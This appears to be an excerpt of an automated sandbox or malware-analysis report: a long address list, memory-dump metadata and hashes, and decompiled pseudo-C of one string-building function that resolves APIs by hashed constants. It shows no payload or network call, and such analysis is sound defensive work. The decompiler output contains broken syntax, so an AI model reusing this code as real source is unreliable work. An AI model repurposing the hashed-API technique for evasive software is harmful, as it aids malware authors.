0x008b46ce
0x008b46ce
0x008b46ab
0x008b46d2
0x008b46d4
0x008b46d5
0x008b46da
0x008b46da
0x008b46ea
0x008b46ec
0x008b4501
0x008b4503
0x008b4506
0x008b4528
0x008b452c
0x008b4538
0x008b453e
0x008b4542
0x008b4544
0x008b4544
0x008b4549
0x008b454d
0x008b4553
0x00000000
0x00000000
0x008b4559
0x008b455e
0x00000000
0x008b4560
0x008b4560
0x008b456c
0x008b4582
0x008b4582
0x008b456e
0x008b456e
0x008b4570
0x008b457a
0x008b4580
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4580
0x008b4b84
0x008b4b84
0x008b456c
0x00000000
0x008b455e
0x008b4b8d
0x008b4b92
0x008b4508
0x008b4508
0x008b4512
0x008b4516
0x008b4519
0x008b4523
0x008b4526
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4526
0x008b4b9b
0x008b4b9b
0x008b458a
0x008b4593
0x008b4599
0x008b459e
0x008b45b7
0x008b45ba
0x008b45be
0x008b45c4
0x008b45cc
0x008b45cc
0x008b45d8
0x008b45db
0x008b45df
0x008b45e0
0x008b45e5
0x008b45e9
0x008b45ec
0x008b45f0
0x008b463c
0x008b45f2
0x008b45f7
0x008b45f9
0x008b45fb
0x008b45fe
0x008b4602
0x008b4604
0x008b4607
0x008b4609
0x008b460d
0x008b460f
0x008b460f
0x008b4610
0x008b4615
0x008b461b
0x00000000
0x00000000
0x008b461d
0x008b4621
0x008b4626
0x00000000
0x00000000
0x00000000
0x008b4626
0x008b4628
0x008b462b
0x008b462b
0x008b4602
0x008b462f
0x008b4631
0x008b4632
0x008b4637
0x008b4637
0x008b4647
0x008b464a
0x008b45a0
0x008b45a0
0x008b45a0
0x008b4651
0x008b4657
0x008b465b
0x008b465d
0x008b4661
0x008b4665
0x008b4665
0x008b4666
0x008b466b
0x008b4671
0x00000000
0x00000000
0x008b467d
0x00000000
0x008b467f
0x008b467f
0x008b467f
0x00000000
0x008b467d
0x008b4b77
0x008b4b7b
0x008b4b7b
0x008b4651
0x008b44f2
0x008b46f7
0x008b4703
0x008b470c
0x008b470d
0x008b4711
0x00000000
0x008b4bf9
0x008b4bf3
0x008b43ec
0x008b4713
0x008b4713
0x008b471d
0x008b4721
0x008b4725
0x008b472a
0x008b4a96
0x008b4a98
0x008b4a9c
0x008b4aa0
0x008b4aa6
0x008b4aaa
0x008b4aac
0x008b4bd2
0x008b4ab2
0x008b4ab4
0x008b4ab8
0x008b4aba
0x008b4abc
0x008b4abc
0x008b4ac1
0x008b4ac3
0x008b4ac5
0x008b4aca
0x008b4aca
0x008b4ace
0x008b4ad4
0x008b4ad6
0x008b4ad8
0x008b4add
0x008b4add
0x008b4ae1
0x008b4ae2
0x008b4ae6
0x008b4ae8
0x008b4aea
0x008b4aee
0x008b4aee
0x008b4aee
0x008b4af2
0x008b4af7
0x008b4af9
0x008b4aff
0x008b4b01
0x008b4b03
0x008b4b08
0x008b4b08
0x008b4aff
0x008b4af7
0x008b4730
0x008b4730
0x008b4736
0x008b4738
0x008b473d
0x008b479a
0x008b479a
0x008b473f
0x008b4741
0x008b4744
0x008b4746
0x008b4bdc
0x008b474c
0x008b474c
0x008b4750
0x008b4752
0x008b4754
0x008b4754
0x008b4759
0x008b475b
0x008b475d
0x008b4762
0x008b4762
0x008b4765
0x008b476b
0x008b476d
0x008b476f
0x008b4774
0x008b4774
0x008b4777
0x008b4778
0x008b477c
0x008b4780
0x008b4780
0x008b4780
0x008b4784
0x008b4789
0x008b478b
0x008b4791
0x008b4793
0x008b4795
0x00000000
0x008b4795
0x008b4791
0x008b4789
0x008b479d
0x008b479f
0x008b47a0
0x008b47a5
0x008b47a8
0x008b47ac
0x008b47b5
0x008b47d6
0x008b47e0
0x008b47e4
0x008b47e7
0x008b47ec
0x008b47ef
0x008b47f3
0x008b47f6
0x008b47fa
0x00000000
0x008b47fc
0x008b47fc
0x008b4800
0x008b4802
0x008b4806
0x008b4806
0x008b4808
0x008b480e
0x008b4810
0x008b4815
0x008b4a74
0x008b4a76
0x008b481b
0x008b481d
0x008b481e
0x008b4826
0x008b4828
0x008b4831
0x008b4835
0x008b483c
0x008b483c
0x008b4842
0x008b4844
0x008b4847
0x008b484b
0x008b4a04
0x008b4a06
0x008b4a0b
0x008b4a0f
0x008b4a12
0x008b4a16
0x008b4a63
0x008b4a18
0x008b4a1c
0x008b4a1e
0x008b4a20
0x008b4a23
0x008b4a27
0x008b4a29
0x008b4a2d
0x008b4a2f
0x008b4a33
0x008b4a35
0x008b4a35
0x008b4a36
0x008b4a3b
0x008b4a41
0x00000000
0x00000000
0x008b4a43
0x008b4a47
0x008b4a4c
0x00000000
0x00000000
0x00000000
0x008b4a4c
0x008b4a4e
0x008b4a52
0x008b4a52
0x008b4a27
0x008b4a56
0x008b4a58
0x008b4a59
0x008b4a5e
0x008b4a5e
0x008b4a69
0x008b4a6b
0x008b485a
0x008b485c
0x008b485f
0x008b4881
0x008b4885
0x008b4891
0x008b4896
0x008b489a
0x008b489e
0x008b48a0
0x008b48a0
0x008b48a5
0x008b48a9
0x008b48af
0x00000000
0x00000000
0x008b48b5
0x008b48ba
0x00000000
0x008b48bc
0x008b48bc
0x008b48c0
0x008b48cc
0x008b48e4
0x008b48e4
0x008b48ce
0x008b48ce
0x008b48d2
0x008b48dc
0x008b48e2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b48e2
0x00000000
0x008b48d2
0x008b48cc
0x00000000
0x008b48ba
0x008b4bc0
0x008b4bc5
0x008b4bc9
0x008b4861
0x008b4861
0x008b486b
0x008b486f
0x008b4872
0x008b487c
0x008b487f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b487f
0x008b4bb7
0x008b4bb7
0x008b4bb7
0x008b48ec
0x008b48fb
0x008b4900
0x008b4913
0x008b4916
0x008b491a
0x008b491f
0x008b4927
0x008b4927
0x008b4934
0x008b4937
0x008b493b
0x008b493c
0x008b4940
0x008b4945
0x008b4949
0x008b494b
0x008b494e
0x008b4950
0x008b4956
0x008b49bc
0x008b4958
0x008b495a
0x008b495c
0x008b495f
0x008b4963
0x008b4965
0x008b4969
0x008b496b
0x008b496f
0x008b4973
0x008b4977
0x008b4977
0x008b4978
0x008b497d
0x008b4983
0x00000000
0x00000000
0x008b4985
0x008b4989
0x008b498e
0x00000000
0x00000000
0x00000000
0x008b498e
0x008b4990
0x008b4994
0x008b4998
0x008b4998
0x008b4963
0x008b499c
0x008b499e
0x008b49a2
0x008b49a6
0x008b49aa
0x008b49af
0x008b49b3
0x008b49b7
0x008b49b7
0x008b49c3
0x008b49c6
0x008b4902
0x008b4902
0x008b4902
0x008b49ca
0x008b49d2
0x008b49d6
0x008b49da
0x008b49dc
0x008b49e0
0x008b49e0
0x008b49e1
0x008b49e6
0x008b49ec
0x00000000
0x00000000
0x008b49f8
0x00000000
0x008b49fa
0x008b49fa
0x008b49fe
0x008b49fe
0x00000000
0x008b49f8
0x008b4ba6
0x008b4baa
0x008b4bae
0x008b4bae
0x008b49ca
0x008b484b
0x008b4a7d
0x008b4a7d
0x008b4a84
0x008b4a88
0x008b4a90
0x008b4a92
0x00000000
0x008b4a92
0x008b47b7
0x008b47b7
0x008b47b9
0x008b47bd
0x008b47c1
0x008b47c1
0x008b47b5
0x008b472a
0x008b43b7
0x008b4b0c
0x008b4b0e
0x008b4b0f
0x008b4b17
0x008b4b2a
0x008b4b2a
0x00000000

Strings

, xrefs: 008B3EF7

Memory Dump Source

Source File: 00000004.00000002.2407055275.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: true

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 5ad7d40b83354f052e6876d3bbbe09be674a171d3fdd31e2da66a3511681a7da
Instruction ID: 2a560f24bdee5261301556a1206c034d3dce6b9234aa321f36659f309df95804
Opcode Fuzzy Hash: 5ad7d40b83354f052e6876d3bbbe09be674a171d3fdd31e2da66a3511681a7da
Instruction Fuzzy Hash: 5F920670A087528BD725CE2C848276ABBE1FFD5314F189A6DE895DB393DB30D941C782

Uniqueness

Uniqueness Score: -1.00%

Function 008B62F0, Relevance: 2.2, Strings: 1, Instructions: 961
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E008B62F0(intOrPtr* __ecx, signed int __edx, void* __eflags, char _a4) {
				intOrPtr* _v24;
				char _v32;
				intOrPtr _v36;
				unsigned int _v40;
				signed int _v44;
				signed int _v52;
				char _v56;
				unsigned int _v60;
				unsigned int _v64;
				signed int _v68;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				void* _t272;
				char _t278;
				char _t279;
				char* _t281;
				signed int _t282;
				char _t283;
				void* _t287;
				char _t290;
				char _t291;
				char* _t293;
				signed int _t294;
				char _t295;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr* _t308;
				signed int _t310;
				signed int _t311;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				char* _t320;
				char* _t321;
				unsigned int _t322;
				unsigned int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t332;
				signed int _t333;
				signed int _t336;
				signed int _t338;
				signed int _t339;
				signed int _t342;
				char* _t343;
				char* _t344;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t352;
				char* _t353;
				char* _t357;
				signed int _t359;
				signed int _t361;
				signed int _t362;
				signed int _t365;
				unsigned int _t375;
				signed int _t377;
				signed int _t381;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed int _t395;
				signed int _t407;
				signed int _t417;
				char* _t418;
				char _t420;
				signed int _t421;
				void* _t431;
				char _t432;
				char _t434;
				char _t435;
				char* _t436;
				char _t438;
				char* _t439;
				char _t440;
				signed int _t441;
				void* _t451;
				char _t452;
				char _t454;
				char _t455;
				char* _t456;
				char _t458;
				char _t460;
				char _t461;
				signed int _t463;
				signed int _t465;
				void* _t469;
				char _t471;
				char _t472;
				signed int _t476;
				void* _t478;
				char _t480;
				char _t481;
				void* _t482;
				char _t484;
				char _t485;
				char _t489;
				char _t490;
				char _t491;
				char _t492;
				char _t493;
				char _t494;
				signed int _t497;
				char* _t499;
				void* _t505;
				unsigned int _t506;
				void* _t512;
				char* _t514;
				void* _t520;
				void* _t521;
				void* _t522;
				void* _t523;
				signed int _t524;
				void* _t531;
				void* _t537;
				void* _t543;
				signed int _t544;
				signed int _t548;
				void* _t551;
				void* _t552;
				void* _t553;

				_t306 = __ecx;
				_push(0x40);
				_t496 = __edx;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t514 = E008A1030();
				_t551 = (_t548 & 0xfffffff0) - 0x34 + 4;
				_t320 =  *__ecx;
				if(_t320 == 0) {
					 *_t514 = 0;
				} else {
					if(_t514 != 0) {
						_t492 =  *_t320;
						 *_t514 = _t492;
						if(_t492 != 0) {
							_v68 = __edx;
							_t304 = 0;
							while(1) {
								_t304 = _t304 + 1;
								_t493 =  *((char*)(_t320 + _t304 * 2 - 1));
								 *((char*)(_t514 + _t304 * 2 - 1)) = _t493;
								if(_t493 == 0) {
									break;
								}
								_t494 =  *((char*)(_t320 + _t304 * 2));
								 *((char*)(_t514 + _t304 * 2)) = _t494;
								if(_t494 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
					}
					_push(1);
					_push(_t320);
					E008A10B0();
					_t551 = _t551 + 8;
				}
				_v44 = 0;
				_push(0x40);
				 *_t306 = _t514;
				 *((intOrPtr*)(_t306 + 4)) = 0x40;
				_t264 = E008A1030();
				_t552 = _t551 + 4;
				_t321 = _v44;
				if(_t321 == 0) {
					 *_t264 = 0;
					_v40 = 0x40;
					_v44 = _t264;
					goto L18;
				} else {
					if(_t264 == 0) {
						_push(1);
						_push(_t321);
						E008A10B0();
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_t520 = 0;
						_v44 = 0;
						goto L29;
					} else {
						_t489 =  *_t321;
						 *_t264 = _t489;
						if(_t489 != 0) {
							_v40 = 0;
							_t544 = 0;
							_v68 = _t496;
							while(1) {
								_t544 = _t544 + 1;
								_t490 =  *((char*)(_t321 + _t544 * 2 - 1));
								 *((char*)(_t264 + _t544 * 2 - 1)) = _t490;
								if(_t490 == 0) {
									break;
								}
								_t491 =  *((char*)(_t321 + _t544 * 2));
								 *((char*)(_t264 + _t544 * 2)) = _t491;
								if(_t491 != 0) {
									continue;
								}
								break;
							}
							_t496 = _v68;
						}
						_push(1);
						_push(_t321);
						_v64 = _t264;
						E008A10B0();
						_t264 = _v64;
						_t552 = _t552 + 8;
						_v40 = 0x40;
						_v44 = _t264;
						L18:
						_t387 = _t264 & 0x0000000f;
						if(_t387 == 0) {
							L22:
							asm("pxor xmm0, xmm0");
							_t520 =  ~( ~_t387 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t321 != 0) {
									break;
								}
								_t387 = _t387 + 0x10;
								if(_t387 < _t520) {
									continue;
								} else {
									if(_t520 >= 0x7fffffff) {
										L28:
										_t520 = 0x7fffffff;
										goto L29;
									} else {
										while( *((char*)(_t520 + _t264)) != 0) {
											_t520 = _t520 + 1;
											if(_t520 < 0x7fffffff) {
												continue;
											} else {
												goto L28;
											}
											goto L30;
										}
										goto L250;
									}
								}
								goto L30;
							}
							asm("bsf esi, ecx");
							_t520 = _t520 + _t387;
							goto L250;
						} else {
							_t520 = 0;
							_t387 =  ~_t387 + 0x10;
							while( *((char*)(_t520 + _t264)) != 0) {
								_t520 = _t520 + 1;
								if(_t520 < _t387) {
									continue;
								} else {
									goto L22;
								}
								goto L30;
							}
							L250:
							if(_t520 != 0xfffffffe || _t264 == 0) {
								L29:
								_t322 = 0x40;
							} else {
								 *_t264 = 0;
								_t322 = _v40;
							}
							goto L30;
							L124:
							 *((char*)(_t269 + _t523)) = 0x64;
							_t417 = _v44;
							 *((char*)(_t523 + _t417 + 1)) = 0;
							if(_a4 == 0) {
								_v32 = _t496;
								_t497 = _v44;
								_v36 = _t497;
								_push(0x200);
								_t524 = E008A1030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t272 = E008A15C0(0x588ab3ea, 0x8a156a0e);
								if(_t272 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t418 =  *_t308;
										if(_t418 != 0) {
											 *_t418 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E008A1030();
											_t553 = _t553 + 4;
											_t344 =  *_t308;
											if(_t344 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t420 =  *_t344;
													 *_t499 = _t420;
													if(_t420 != 0) {
														_v24 = _t308;
														_t421 = 0;
														while(1) {
															_t421 = _t421 + 1;
															_t278 =  *((char*)(_t344 + _t421 * 2 - 1));
															 *((char*)(_t499 + _t421 * 2 - 1)) = _t278;
															if(_t278 == 0) {
																break;
															}
															_t279 =  *((char*)(_t344 + _t421 * 2));
															 *((char*)(_t499 + _t421 * 2)) = _t279;
															if(_t279 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t344);
												E008A10B0();
												_t553 = _t553 + 8;
											}
											goto L225;
										}
									} else {
										_t346 = _t524 & 0x0000000f;
										if(_t346 == 0) {
											L184:
											asm("pxor xmm0, xmm0");
											_t505 =  ~( ~_t346 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t417 != 0) {
													break;
												}
												_t346 = _t346 + 0x10;
												if(_t346 < _t505) {
													continue;
												} else {
													if(_t505 >= 0x7fffffff) {
														L190:
														_t505 = 0x7fffffff;
													} else {
														while( *((char*)(_t505 + _t524)) != 0) {
															_t505 = _t505 + 1;
															if(_t505 < 0x7fffffff) {
																continue;
															} else {
																goto L190;
															}
															goto L191;
														}
														goto L234;
													}
												}
												goto L191;
											}
											asm("bsf edi, edx");
											_t505 = _t505 + _t346;
											goto L234;
										} else {
											_t505 = 0;
											_t346 =  ~_t346 + 0x10;
											while( *((char*)(_t505 + _t524)) != 0) {
												_t505 = _t505 + 1;
												if(_t505 < _t346) {
													continue;
												} else {
													goto L184;
												}
												goto L191;
											}
											L234:
											if(_t505 == 0xffffffff) {
												_t436 =  *_t308;
												if(_t436 != 0) {
													 *_t436 = 0;
												}
											}
										}
										L191:
										_t216 = _t505 + 1; // 0x80000000
										_t348 =  <=  ? 0x40 : _t216;
										if(_t348 >  *((intOrPtr*)(_t308 + 4))) {
											_v64 = (_t348 >> 5 >> 0x1a) + _t348 >> 6;
											_t349 = _t348 & 0x8000003f;
											if(_t349 < 0) {
												_t349 = (_t349 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t352 = _v64 + (0 | _t349 > 0x00000000) << 6;
											_v64 = _t352;
											_push(_t352);
											_t353 = E008A1030();
											_t553 = _t553 + 4;
											_t281 =  *_t308;
											if(_t281 == 0) {
												 *_t353 = 0;
											} else {
												if(_t353 != 0) {
													_t432 =  *_t281;
													 *_t353 = _t432;
													if(_t432 != 0) {
														_v68 = _t524;
														_v24 = _t308;
														_t311 = 0;
														while(1) {
															_t311 = _t311 + 1;
															_t434 =  *((char*)(_t281 + _t311 * 2 - 1));
															 *((char*)(_t353 + _t311 * 2 - 1)) = _t434;
															if(_t434 == 0) {
																break;
															}
															_t435 =  *((char*)(_t281 + _t311 * 2));
															 *((char*)(_t353 + _t311 * 2)) = _t435;
															if(_t435 != 0) {
																continue;
															}
															break;
														}
														_t524 = _v68;
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t281);
												_v68 = _t353;
												E008A10B0();
												_t353 = _v68;
												_t553 = _t553 + 8;
											}
											 *((intOrPtr*)(_t308 + 4)) = _v64;
											 *_t308 = _t353;
										} else {
											_t353 =  *_t308;
										}
										_t282 = _t524;
										if(_t353 != 0 && _t524 != 0) {
											_v24 = _t308;
											_t431 = 0;
											_t310 = _t282;
											while(1) {
												_t283 =  *_t310;
												_t431 = _t431 + 1;
												 *_t353 = _t283;
												if(_t505 != 0 && _t431 == _t505) {
													goto L228;
												}
												if(_t283 == 0) {
													goto L229;
												} else {
													_t353 = _t353 + 1;
													_t310 = _t310 + 1;
													continue;
												}
												goto L226;
											}
											goto L228;
										}
									}
									goto L226;
								} else {
									_push( &_v32);
									_push(_t497);
									_push(0x200);
									_push(_t524);
									asm("int3");
									return _t272;
								}
							} else {
								_v52 = _t496;
								_t438 = _a4;
								_t506 = _v44;
								_v56 = _t438;
								_v60 = _t506;
								_push(0x200);
								_t524 = E008A1030();
								_t553 = _t552 + 4;
								_v24 = _t306;
								_t287 = E008A15C0(0x588ab3ea, 0x8a156a0e);
								if(_t287 == 0) {
									_t308 = _v24;
									if(_t524 == 0 ||  *_t524 == 0) {
										_t439 =  *_t308;
										if(_t439 != 0) {
											 *_t439 = 0;
										}
										if( *((intOrPtr*)(_t308 + 4)) < 0x40) {
											_push(0x40);
											_t499 = E008A1030();
											_t553 = _t553 + 4;
											_t357 =  *_t308;
											if(_t357 == 0) {
												 *_t499 = 0;
											} else {
												if(_t499 != 0) {
													_t440 =  *_t357;
													 *_t499 = _t440;
													if(_t440 != 0) {
														_v24 = _t308;
														_t441 = 0;
														while(1) {
															_t441 = _t441 + 1;
															_t290 =  *((char*)(_t357 + _t441 * 2 - 1));
															 *((char*)(_t499 + _t441 * 2 - 1)) = _t290;
															if(_t290 == 0) {
																break;
															}
															_t291 =  *((char*)(_t357 + _t441 * 2));
															 *((char*)(_t499 + _t441 * 2)) = _t291;
															if(_t291 != 0) {
																continue;
															}
															break;
														}
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t357);
												E008A10B0();
												_t553 = _t553 + 8;
											}
											L225:
											 *_t308 = _t499;
											 *((intOrPtr*)(_t308 + 4)) = 0x40;
										}
									} else {
										_t359 = _t524 & 0x0000000f;
										if(_t359 == 0) {
											L134:
											asm("pxor xmm0, xmm0");
											_t512 =  ~( ~_t359 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											while(1) {
												asm("movdqu xmm1, [esi+ecx]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb edx, xmm1");
												if(_t438 != 0) {
													break;
												}
												_t359 = _t359 + 0x10;
												if(_t359 < _t512) {
													continue;
												} else {
													if(_t512 >= 0x7fffffff) {
														L140:
														_t512 = 0x7fffffff;
													} else {
														while( *((char*)(_t512 + _t524)) != 0) {
															_t512 = _t512 + 1;
															if(_t512 < 0x7fffffff) {
																continue;
															} else {
																goto L140;
															}
															goto L141;
														}
														goto L230;
													}
												}
												goto L141;
											}
											asm("bsf edi, edx");
											_t512 = _t512 + _t359;
											goto L230;
										} else {
											_t512 = 0;
											_t359 =  ~_t359 + 0x10;
											while( *((char*)(_t512 + _t524)) != 0) {
												_t512 = _t512 + 1;
												if(_t512 < _t359) {
													continue;
												} else {
													goto L134;
												}
												goto L141;
											}
											L230:
											if(_t512 == 0xffffffff) {
												_t456 =  *_t308;
												if(_t456 != 0) {
													 *_t456 = 0;
												}
											}
										}
										L141:
										_t171 = _t512 + 1; // 0x80000000
										_t361 =  <=  ? 0x40 : _t171;
										if(_t361 >  *((intOrPtr*)(_t308 + 4))) {
											_v64 = (_t361 >> 5 >> 0x1a) + _t361 >> 6;
											_t362 = _t361 & 0x8000003f;
											if(_t362 < 0) {
												_t362 = (_t362 - 0x00000001 | 0xffffffc0) + 1;
											}
											_t365 = _v64 + (0 | _t362 > 0x00000000) << 6;
											_v64 = _t365;
											_push(_t365);
											_t353 = E008A1030();
											_t553 = _t553 + 4;
											_t293 =  *_t308;
											if(_t293 == 0) {
												 *_t353 = 0;
											} else {
												if(_t353 != 0) {
													_t452 =  *_t293;
													 *_t353 = _t452;
													if(_t452 != 0) {
														_v68 = _t524;
														_v24 = _t308;
														_t314 = 0;
														while(1) {
															_t314 = _t314 + 1;
															_t454 =  *((char*)(_t293 + _t314 * 2 - 1));
															 *((char*)(_t353 + _t314 * 2 - 1)) = _t454;
															if(_t454 == 0) {
																break;
															}
															_t455 =  *((char*)(_t293 + _t314 * 2));
															 *((char*)(_t353 + _t314 * 2)) = _t455;
															if(_t455 != 0) {
																continue;
															}
															break;
														}
														_t524 = _v68;
														_t308 = _v24;
													}
												}
												_push(1);
												_push(_t293);
												_v68 = _t353;
												E008A10B0();
												_t353 = _v68;
												_t553 = _t553 + 8;
											}
											 *((intOrPtr*)(_t308 + 4)) = _v64;
											 *_t308 = _t353;
										} else {
											_t353 =  *_t308;
										}
										_t294 = _t524;
										if(_t353 != 0 && _t524 != 0) {
											_v24 = _t308;
											_t451 = 0;
											_t313 = _t294;
											while(1) {
												_t295 =  *_t313;
												_t451 = _t451 + 1;
												 *_t353 = _t295;
												if(_t512 != 0 && _t451 == _t512) {
													break;
												}
												if(_t295 == 0) {
													L229:
													_t308 = _v24;
												} else {
													_t353 = _t353 + 1;
													_t313 = _t313 + 1;
													continue;
												}
												goto L226;
											}
											L228:
											_t308 = _v24;
											 *((char*)(_t353 + 1)) = 0;
										}
									}
									L226:
									_push(1);
									_push(_t524);
									E008A10B0();
									_push(1);
									_push(_v44);
									E008A10B0();
									_v44 = 0;
									_v40 = 0;
									return _t308;
								} else {
									_push( &_v56);
									_push(_t506);
									_push(0x200);
									_push(_t524);
									asm("int3");
									return _t287;
								}
							}
						}
					}
				}
				L30:
				_t34 = _t520 + 2; // -2147483660
				_t389 =  <=  ? 0x40 : _t34;
				if(_t322 < _t389) {
					_t327 = (_t389 >> 5 >> 0x1a) + _t389 >> 6;
					_v60 = _t327;
					_t390 = _t389 & 0x8000003f;
					if(_t390 < 0) {
						_t390 = (_t390 - 0x00000001 | 0xffffffc0) + 1;
					}
					_t329 = _t327 + (0 | _t390 > 0x00000000) << 6;
					_v60 = _t329;
					_push(_t329);
					_t266 = E008A1030();
					_t552 = _t552 + 4;
					_t330 = _v44;
					if(_t330 == 0) {
						 *_t266 = 0;
					} else {
						if(_t266 != 0) {
							_t482 =  *_t330;
							 *_t266 = _t482;
							if(_t482 != 0) {
								_v24 = _t306;
								_t318 = 0;
								_v68 = _t496;
								while(1) {
									_t318 = _t318 + 1;
									_t484 =  *((char*)(_t330 + _t318 * 2 - 1));
									 *((char*)(_t266 + _t318 * 2 - 1)) = _t484;
									if(_t484 == 0) {
										break;
									}
									_t485 =  *((char*)(_t330 + _t318 * 2));
									 *((char*)(_t266 + _t318 * 2)) = _t485;
									if(_t485 != 0) {
										continue;
									}
									break;
								}
								_t306 = _v24;
								_t496 = _v68;
							}
						}
						_push(1);
						_push(_t330);
						_v64 = _t266;
						E008A10B0();
						_t266 = _v64;
						_t552 = _t552 + 8;
					}
					_v40 = _v60;
					_v44 = _t266;
				} else {
					_t266 = _v44;
				}
				 *((char*)(_t266 + _t520)) = 0x25;
				 *((char*)(_t520 + _v44 + 1)) = 0;
				if(_a4 != 0) {
					_t395 = _v44;
					if(_t395 == 0) {
						_t521 = 0;
					} else {
						_t381 = _t395 & 0x0000000f;
						if(_t381 == 0) {
							L51:
							asm("pxor xmm0, xmm0");
							_t543 =  ~( ~_t381 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [edx+ecx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								if(_t266 != 0) {
									break;
								}
								_t381 = _t381 + 0x10;
								if(_t381 < _t543) {
									continue;
								} else {
									if(_t543 >= 0x7fffffff) {
										L57:
										_t521 = 0x7fffffff;
									} else {
										while( *((char*)(_t543 + _t395)) != 0) {
											_t543 = _t543 + 1;
											if(_t543 < 0x7fffffff) {
												continue;
											} else {
												goto L57;
											}
											goto L58;
										}
										goto L246;
									}
								}
								goto L58;
							}
							asm("bsf esi, eax");
							_t521 = _t543 + _t381;
							goto L246;
						} else {
							_t521 = 0;
							_t381 =  ~_t381 + 0x10;
							while( *((char*)(_t521 + _t395)) != 0) {
								_t521 = _t521 + 1;
								if(_t521 < _t381) {
									continue;
								} else {
									goto L51;
								}
								goto L58;
							}
							L246:
							if(_t521 == 0xfffffffe) {
								 *_t395 = 0;
							}
						}
					}
					L58:
					_t332 =  <=  ? 0x40 : _t521 + 2;
					if(_t332 > _v40) {
						_v60 = (_t332 >> 5 >> 0x1a) + _t332 >> 6;
						_t333 = _t332 & 0x8000003f;
						if(_t333 < 0) {
							_t333 = (_t333 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t336 = _v60 + (0 | _t333 > 0x00000000) << 6;
						_v60 = _t336;
						_push(_t336);
						_t267 = E008A1030();
						_t552 = _t552 + 4;
						_t332 = _v44;
						if(_t332 == 0) {
							 *_t267 = 0;
						} else {
							if(_t267 != 0) {
								_t478 =  *_t332;
								 *_t267 = _t478;
								if(_t478 != 0) {
									_v24 = _t306;
									_t317 = 0;
									_v68 = _t496;
									while(1) {
										_t317 = _t317 + 1;
										_t480 =  *((char*)(_t332 + _t317 * 2 - 1));
										 *((char*)(_t267 + _t317 * 2 - 1)) = _t480;
										if(_t480 == 0) {
											break;
										}
										_t481 =  *((char*)(_t332 + _t317 * 2));
										 *((char*)(_t267 + _t317 * 2)) = _t481;
										if(_t481 != 0) {
											continue;
										}
										break;
									}
									_t306 = _v24;
									_t496 = _v68;
								}
							}
							_push(1);
							_push(_t332);
							_v64 = _t267;
							E008A10B0();
							_t267 = _v64;
							_t552 = _t552 + 8;
						}
						_v40 = _v60;
						_v44 = _t267;
					} else {
						_t267 = _v44;
					}
					 *((char*)(_t267 + _t521)) = 0x30;
					 *((char*)(_t521 + _v44 + 1)) = 0;
					_t268 = _v44;
					if(_t268 == 0) {
						_t522 = 0;
					} else {
						_t476 = _t268 & 0x0000000f;
						if(_t476 == 0) {
							L77:
							asm("pxor xmm0, xmm0");
							_t537 =  ~( ~_t476 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [eax+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ecx, xmm1");
								if(_t332 != 0) {
									break;
								}
								_t476 = _t476 + 0x10;
								if(_t476 < _t537) {
									continue;
								} else {
									if(_t537 >= 0x7fffffff) {
										L83:
										_t522 = 0x7fffffff;
									} else {
										while( *((char*)(_t537 + _t268)) != 0) {
											_t537 = _t537 + 1;
											if(_t537 < 0x7fffffff) {
												continue;
											} else {
												goto L83;
											}
											goto L84;
										}
										goto L242;
									}
								}
								goto L84;
							}
							asm("bsf esi, ecx");
							_t522 = _t537 + _t476;
							goto L242;
						} else {
							_t522 = 0;
							_t476 =  ~_t476 + 0x10;
							while( *((char*)(_t522 + _t268)) != 0) {
								_t522 = _t522 + 1;
								if(_t522 < _t476) {
									continue;
								} else {
									goto L77;
								}
								goto L84;
							}
							L242:
							if(_t522 == 0xfffffffe) {
								 *_t268 = 0;
							}
						}
					}
					L84:
					_t330 = 0x40;
					_t407 =  <=  ? 0x40 : _t522 + 2;
					if(_t407 > _v40) {
						_t375 = (_t407 >> 5 >> 0x1a) + _t407 >> 6;
						_v60 = _t375;
						_t465 = _t407 & 0x8000003f;
						if(_t465 < 0) {
							_t465 = (_t465 - 0x00000001 | 0xffffffc0) + 1;
						}
						_t377 = _t375 + (0 | _t465 > 0x00000000) << 6;
						_v60 = _t377;
						_push(_t377);
						_t268 = E008A1030();
						_t552 = _t552 + 4;
						_t330 = _v44;
						if(_t330 == 0) {
							 *_t268 = 0;
						} else {
							if(_t268 != 0) {
